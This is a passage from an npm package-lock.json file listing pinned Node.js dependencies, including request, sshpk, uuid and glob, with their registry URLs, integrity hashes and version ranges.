"https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": 
"sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": 
"https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", 
"assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", 
"dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, 
"ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", 
"integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "requires": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.5.0", "resolved": 
"https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "requires": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": 
"sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": 
"sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": 
true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": 